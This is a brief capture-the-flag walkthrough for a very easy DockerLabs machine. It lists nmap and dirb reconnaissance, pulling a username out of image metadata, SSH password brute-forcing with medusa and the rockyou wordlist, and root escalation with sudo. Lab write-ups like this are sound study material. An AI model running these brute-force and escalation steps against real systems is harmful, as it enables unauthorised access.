Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

BorazuwarahCTF

machine downloaded from: https://dockerlabs.es/

difficulty: Very Easy

OS: Linux

14 September 2025


  1. Start container.
bash auto_deploy.sh borazuwarahctf.tar
  1. Quick host scan.
nmap -A -T5 172.17.0.2

Nmap detected two services:

  • Port 22 ssh
  • Port 80 http
  1. Web discovery
dirb http://172.17.0.2
  1. Download image and inspect metadata/strings
wget http://172.17.0.2/imagen.jpg -O imagen.jpg
exiftool image.jpg
strings image.jpg | less

Username borazuwarah found.

  1. SSH brute force using medusa.
medusa -h 172.17.0.2 -F -u borazuwarah -P /usr/share/wordlists/rockyou.txt -M ssh
  1. Privilege Escalation after successful login:
ssh borazuwarah@$IP
# once in:
sudo -l          # show sudo rights
sudo bash